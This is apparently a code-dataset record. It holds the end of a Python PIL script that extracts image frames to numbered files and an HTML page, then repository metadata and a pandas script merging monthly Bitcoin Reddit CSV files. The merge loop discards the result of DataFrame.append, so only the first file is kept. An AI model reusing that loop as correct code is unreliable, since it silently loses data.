print("file002.ext, etc. You can insert %d to control the placement") print("and syntax of the frame number.") print() print("The optional range argument specifies which frames to extract.") print("You can give one or more ranges like 1-10, 5, -15 etc. If") print("omitted, all frames are extracted.") sys.exit(1) infile = sys.argv[1] outfile = sys.argv[2] frames = Interval(",".join(sys.argv[3:])) try: # check if outfile contains a placeholder outfile % 1 except TypeError: file, ext = os.path.splitext(outfile) outfile = file + "%03d" + ext ix = 1 im = Image.open(infile) if html: file, ext = os.path.splitext(outfile) html = open(file+".html", "w") html.write("<html>\n<body>\n") while True: if frames[ix]: im.save(outfile % ix) print(outfile % ix) if html: html.write("<img src='%s'><br>\n" % outfile % ix) try: im.seek(ix) except EOFError: break ix += 1 if html: html.write("</body>\n</html>\n")
22.026549
75
0.541985
46d4ac9d6ba9a35229d0b6a5ff3743e6824f5b81
629
py
Python
code/merge_reddit.py
xjohnwu/dorahacktradegeneration
a6b2fa0dbe631bae028d0d6e70663d129a37cdbc
[ "MIT" ]
null
null
null
code/merge_reddit.py
xjohnwu/dorahacktradegeneration
a6b2fa0dbe631bae028d0d6e70663d129a37cdbc
[ "MIT" ]
null
null
null
code/merge_reddit.py
xjohnwu/dorahacktradegeneration
a6b2fa0dbe631bae028d0d6e70663d129a37cdbc
[ "MIT" ]
1
2018-10-20T12:34:24.000Z
2018-10-20T12:34:24.000Z
import pandas as pd import numpy as np path = 'C:/dorahacktradegeneration/data' full_data = None files = ['bitcoin_201709.csv', 'bitcoin_201710.csv', 'bitcoin_201711.csv', 'bitcoin_201801.csv', 'bitcoin_201802.csv', 'bitcoin_201803.csv', 'bitcoin_201804.csv', 'bitcoin_201805.csv', 'bitcoin_201806.csv', 'bitcoin_201807.csv', 'bitcoin_201808.csv', 'bitcoin_201809.csv', 'bitcoin_201810.csv'] for file in files: data = pd.read_csv(path + """/""" + file) if full_data is None: full_data = data else: full_data.append(data, ignore_index=True) full_data.to_csv('reddit_all.csv')
31.45
119
0.691574